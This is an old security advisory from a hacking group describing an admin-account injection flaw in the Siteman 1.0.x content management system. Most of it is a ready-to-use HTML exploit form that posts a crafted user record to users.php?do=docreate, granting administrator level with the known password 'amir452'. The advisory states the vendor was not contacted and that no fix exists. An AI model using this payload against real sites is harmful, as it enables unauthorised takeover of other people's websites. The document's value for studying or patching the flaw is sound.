God Admin Injection Vulnerability in Siteman 1.0.x
God Admin Injection Vulnerability in Siteman 1.0.x,
Discovered by PersianHacker.NET Security Team
by amironline452 (amironline452 hotmail com)
http://www.PersianHacker.NET
http://www.amironline452.tk
Siteman is a Content Management System (CMS) that is so easy to install and
use, that
a person who has no knowledge about creating homepages can get a profesionally
looking website up and running in just minutes.
More info @
http://sitem.sourceforge.net/
http://sourceforge.net/projects/sitem/
Discussion:
With this Vulnerability you can create God Admin user in Siteman v1.0.x.
Exploiet:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0"
cellpadding="2"><tr><td>Username(Use this, and not your display name,
when
logging in)</td><td
align="right">amir452</td></tr><tr><td>Password</td><td
align="right"><form><select><option>Click to show password</option>
<option>amir452</option></select></form></td></tr><tr><td>Secret
Question (Asked when you forget your password)</td><td
align="right">amir452</td></tr><tr><td>Answer to secret
question</td><td
align="right"><form>
<select>
<option>Click to show answer</option>
<option>amir452</option>
</select></form>
</td></tr><tr><td>Display name</td><td
align="right">amir452</td></tr><tr><td>Member Level</td><td
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td
align="right">amir452@xxxxxxxxxxx</td></tr><tr><td>Hide my email
adress</td><td align="right">no</td></tr><tr><td>Forum
Signature</td><td
align="right">hackers</td></table><br /><br />Is this correct?<br
/><table
cellspacing="0" cellpadding="3"><tr><td>
<form action="users.php?do=new" method="post"><input type="submit"
value="no" /></form></td><td>
<form action="http://www.example.com/users.php?do=docreate"
method="post">
<input type="hidden" name="line"
value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@xxxxxxxxxxx|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers"
/><input type="submit" value="yes" /></form></html>
the above exploiet creat God Admin user with folowing info:
username: amir452
password: amir452
Note:
Script authors not contacted.
There is no solution at this time.